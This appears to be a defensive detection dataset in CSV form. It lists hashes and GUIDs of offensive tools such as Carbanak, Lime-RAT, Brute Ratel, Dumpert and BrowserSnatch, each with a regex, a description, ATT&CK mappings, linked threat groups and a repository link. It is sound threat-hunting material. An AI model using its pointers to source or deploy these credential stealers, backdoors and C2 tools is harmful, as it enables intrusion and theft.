"*4876fe3093df0f61892c691ecdf0db052d77c461fac698b50d1fd48e927bd2e9*",".{0,1000}4876fe3093df0f61892c691ecdf0db052d77c461fac698b50d1fd48e927bd2e9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25929"
"*487B9D03-F5C6-45D5-A159-3148F98B5179*",".{0,1000}487B9D03\-F5C6\-45D5\-A159\-3148F98B5179.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","25931"
"*487E2246-72F1-4BD3-AA8A-A9B8C79C9F28*",".{0,1000}487E2246\-72F1\-4BD3\-AA8A\-A9B8C79C9F28.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25932"
"*488785c691425b7cb3c355b1ae38a0527faf339f68a3536f34e1ee10c627790c*",".{0,1000}488785c691425b7cb3c355b1ae38a0527faf339f68a3536f34e1ee10c627790c.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","25933"
"*4889b9e1fa6c34ea86e56253135093b390919aa006f8cd3fa372b410f2f1e5bf*",".{0,1000}4889b9e1fa6c34ea86e56253135093b390919aa006f8cd3fa372b410f2f1e5bf.{0,1000}","offensive_tool_keyword","UnstoppableService","a Windows service in C# that is self installing as a single executable and sets proper attributes to prevent an administrator from stopping or pausing the service through the Windows Service Control Manager interface","T1543.003 - T1564.001 - T1490","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/malcomvetter/UnstoppableService","1","0","#filehash","N/A","5","1","66","15","2019-01-19T22:38:18Z","2018-08-07T22:11:22Z","25934"
"*48a1d2dcff404b6c3b2ab326d85789a29590a1efefe9a1bc2f5b973c39b9ad46*",".{0,1000}48a1d2dcff404b6c3b2ab326d85789a29590a1efefe9a1bc2f5b973c39b9ad46.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25936"
"*48a2b0cc57d547c472ef3f49eaf6ebac2db4dea9f59f522a21cd213bea4da5f7*",".{0,1000}48a2b0cc57d547c472ef3f49eaf6ebac2db4dea9f59f522a21cd213bea4da5f7.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","25937"
"*48a5568360a31333aa809cc28c5a5669a028d32a6ea4b1037813745c5ceffbcc*",".{0,1000}48a5568360a31333aa809cc28c5a5669a028d32a6ea4b1037813745c5ceffbcc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25940"
"*48a61f194676d3b3f1aef3410eabda1ab57448f1966a91a2d1be5af02a2c77c8*",".{0,1000}48a61f194676d3b3f1aef3410eabda1ab57448f1966a91a2d1be5af02a2c77c8.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","25941"
"*48a7984aefe898990b83d8d8ed16f8e8116288fd7531affa4726b262ba3e682c*",".{0,1000}48a7984aefe898990b83d8d8ed16f8e8116288fd7531affa4726b262ba3e682c.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","25942"
"*48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c*",".{0,1000}48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#filehash #linux","N/A","10","10","1135","63","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z","25943"
"*48a968cb02b5e5ebbb4e3b62b2261f7b997c13f6861404968f35997b31d70643*",".{0,1000}48a968cb02b5e5ebbb4e3b62b2261f7b997c13f6861404968f35997b31d70643.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","25944"
"*48b5eeaaaca67edea0fea3c13d20e7e536ed0205b3b39b9afaf3ef251cfa16e7*",".{0,1000}48b5eeaaaca67edea0fea3c13d20e7e536ed0205b3b39b9afaf3ef251cfa16e7.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25946"
"*48b7e423f61b11878891dd7005b2b2ba88f997d4501c405fb9c69f932499ee74*",".{0,1000}48b7e423f61b11878891dd7005b2b2ba88f997d4501c405fb9c69f932499ee74.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25947"
"*48bbbde23d4a33619295aedd90361d246d1edf1082ba361a54b84b706304ef1e*",".{0,1000}48bbbde23d4a33619295aedd90361d246d1edf1082ba361a54b84b706304ef1e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25948"
"*48be356e1719a3dc5c38db4463716ca90a21530266e657b1775b67c7ac25f922*",".{0,1000}48be356e1719a3dc5c38db4463716ca90a21530266e657b1775b67c7ac25f922.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25949"
"*48bf95a01c16f6af2c577d1e1df7e53225edbbfc2014b2ecec5f939e31a6c576*",".{0,1000}48bf95a01c16f6af2c577d1e1df7e53225edbbfc2014b2ecec5f939e31a6c576.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","25950"
"*48c4df943d19bc547c6cab3a3c802dbcf13af3b7880b3977aef74f452c831a95*",".{0,1000}48c4df943d19bc547c6cab3a3c802dbcf13af3b7880b3977aef74f452c831a95.{0,1000}","offensive_tool_keyword","BackHAck","Backdoor Generator with C2 server - Linux & Windows - FUD AV .py .exe","T1090 - T1095 - T1008","TA0011","N/A","N/A","C2","https://github.com/AngelSecurityTeam/BackHAck","1","0","#filehash #linux","N/A","10","10","108","34","2020-03-25T21:30:47Z","2020-03-14T19:00:36Z","25952"
"*48c54a40a96fbfbbbd4b6f7c095e1eaa9f3ff33faa096fabb7f5ff04a6af4e5a*",".{0,1000}48c54a40a96fbfbbbd4b6f7c095e1eaa9f3ff33faa096fabb7f5ff04a6af4e5a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25953"
"*48ca254a725d1c4b6422cde2faa8777559f1513bc9bc032f05ee433be8b5fc55*",".{0,1000}48ca254a725d1c4b6422cde2faa8777559f1513bc9bc032f05ee433be8b5fc55.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25954"
"*48caf6ffe4985e7541b9d34e8b6946d8c99e9d87cb46d146c81029fa280c03ba*",".{0,1000}48caf6ffe4985e7541b9d34e8b6946d8c99e9d87cb46d146c81029fa280c03ba.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25956"
"*48cc9ab2452b8bb8a9230f2a70a9b9e74a9307f9a0792cadb76c042f8b93e1bc*",".{0,1000}48cc9ab2452b8bb8a9230f2a70a9b9e74a9307f9a0792cadb76c042f8b93e1bc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25957"
"*48dd94df199f63a06b571290ca42e17488f7053605449341eb9747807a26aa10*",".{0,1000}48dd94df199f63a06b571290ca42e17488f7053605449341eb9747807a26aa10.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","25958"
"*48e14cff5c1fbf0bdd959c1d8f6dad4d6b38aebc29ef8210fd0ac7156b67b468*",".{0,1000}48e14cff5c1fbf0bdd959c1d8f6dad4d6b38aebc29ef8210fd0ac7156b67b468.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","25960"
"*48f3f5cf9a7cfae9b9a5efc36f0af92513bef873e49afcb0bf234d97bad7b951*",".{0,1000}48f3f5cf9a7cfae9b9a5efc36f0af92513bef873e49afcb0bf234d97bad7b951.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","25962"
"*48f5813a8aedad134e9d5d3ee4be23f50f2cdc98b43d46f86913e2d1d34bd276*",".{0,1000}48f5813a8aedad134e9d5d3ee4be23f50f2cdc98b43d46f86913e2d1d34bd276.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","25963"
"*48f6c28eb0f6be7a624095e620820e21cabb7008c14beee1210d930aa3d9ffb6*",".{0,1000}48f6c28eb0f6be7a624095e620820e21cabb7008c14beee1210d930aa3d9ffb6.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25964"
"*48f877f4424e0357e506fb65e0b673e495a092c3e1a2b0a010451defbb46c817*",".{0,1000}48f877f4424e0357e506fb65e0b673e495a092c3e1a2b0a010451defbb46c817.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25965"
"*48fa7261a91c16d1d37f13b483677729ee83cac7c90633cad4e1142eb41aa1d0*",".{0,1000}48fa7261a91c16d1d37f13b483677729ee83cac7c90633cad4e1142eb41aa1d0.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25966"
"*48fcb3ac5d2ca4147cb46d18b662bc25262988a105fd8c93212297a07af3d615*",".{0,1000}48fcb3ac5d2ca4147cb46d18b662bc25262988a105fd8c93212297a07af3d615.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","25968"
"*48fdbb3b4880b7cfeac74fa40d699f0cee12ffa0d7d2ad1eed7af09ec341b24e*",".{0,1000}48fdbb3b4880b7cfeac74fa40d699f0cee12ffa0d7d2ad1eed7af09ec341b24e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25969"
"*490139a7800992202ca46d3a69882b476014126fc3ed4143c184bcd7f76a5761*",".{0,1000}490139a7800992202ca46d3a69882b476014126fc3ed4143c184bcd7f76a5761.{0,1000}","offensive_tool_keyword","chromepass","ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser. For each password entry. the following information is displayed: Origin URL. Action URL. User Name Field. Password Field. User Name. Password. and Created Time. It allows you to get the passwords from your current running system. or from a user profile stored on external drive.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","GoGoogle - GOBLIN PANDA - Loki","Credential Access","https://www.nirsoft.net/utils/chromepass.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25970"
"*4909f675efb667170fdc1fb04417a959d2f016eb7aa8fc6a41731788bad91c27*",".{0,1000}4909f675efb667170fdc1fb04417a959d2f016eb7aa8fc6a41731788bad91c27.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25971"
"*491012428e225b620985e8fc2af087fe8b85ccd9c9cc0a37bd1385b62f317bbe*",".{0,1000}491012428e225b620985e8fc2af087fe8b85ccd9c9cc0a37bd1385b62f317bbe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","#filehash","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","25972"
"*491919ffbf3bf3ba309a98d7dce8c3b04e4f269faedd59f57ec1943efe668254*",".{0,1000}491919ffbf3bf3ba309a98d7dce8c3b04e4f269faedd59f57ec1943efe668254.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","25974"
"*491d380503b718a363fa4ecc7385c501b12d15369b4a23e55f7fec9306bfb716*",".{0,1000}491d380503b718a363fa4ecc7385c501b12d15369b4a23e55f7fec9306bfb716.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25977"
"*49340cc563c7fa1b0ee0aa45f9ef1ec227713e1bc56f9c184af0323e425119c1*",".{0,1000}49340cc563c7fa1b0ee0aa45f9ef1ec227713e1bc56f9c184af0323e425119c1.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","25980"
"*493e415ef774fe3a7c3ba17a524f02d72bd36b1a49d8e9e0734eecf1d5834155*",".{0,1000}493e415ef774fe3a7c3ba17a524f02d72bd36b1a49d8e9e0734eecf1d5834155.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","25981"
"*494072da9b54381c4b40e55e6131db414797d450b562a67c45168fb3bb46a07c*",".{0,1000}494072da9b54381c4b40e55e6131db414797d450b562a67c45168fb3bb46a07c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25982"
"*494dd15c32c3fe9a43edefb8ae35752f2e596d609a358e4ea1e7b9b4eba8e542*",".{0,1000}494dd15c32c3fe9a43edefb8ae35752f2e596d609a358e4ea1e7b9b4eba8e542.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","25983"
"*4955d7e8fc3d3ded8e3b95757c78b3c4cd969b5fbb92a65267e6141b8faa83d5*",".{0,1000}4955d7e8fc3d3ded8e3b95757c78b3c4cd969b5fbb92a65267e6141b8faa83d5.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","0","#filehash","N/A","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","25984"
"*4957a3e8d46d84698c5987e2c45bc2705865ac8cf742218c574de4cee69da080*",".{0,1000}4957a3e8d46d84698c5987e2c45bc2705865ac8cf742218c574de4cee69da080.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","25985"
"*4962402d7407375db7e69c2d731aec97649668214c27c82b46971733a902ac0b*",".{0,1000}4962402d7407375db7e69c2d731aec97649668214c27c82b46971733a902ac0b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25986"
"*49656d058f63398c98cff95a5bbe76a6911e003ddb7baea082a7e7752525d6a6*",".{0,1000}49656d058f63398c98cff95a5bbe76a6911e003ddb7baea082a7e7752525d6a6.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","25987"
"*49693e06c8e70eabe6a5e3cf8b1624e07462fc0cbb01f1bce18b75af8534c7e1*",".{0,1000}49693e06c8e70eabe6a5e3cf8b1624e07462fc0cbb01f1bce18b75af8534c7e1.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25988"
"*4969b09ab7cae1ba1f02a509b9b7099195fab22321b73039fcce92e9974d7b93*",".{0,1000}4969b09ab7cae1ba1f02a509b9b7099195fab22321b73039fcce92e9974d7b93.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#filehash","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","25989"
"*497a4330455b6f5e625f1d9d7dd92f5c93f8258821b4c26abd142813f8873208*",".{0,1000}497a4330455b6f5e625f1d9d7dd92f5c93f8258821b4c26abd142813f8873208.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25991"
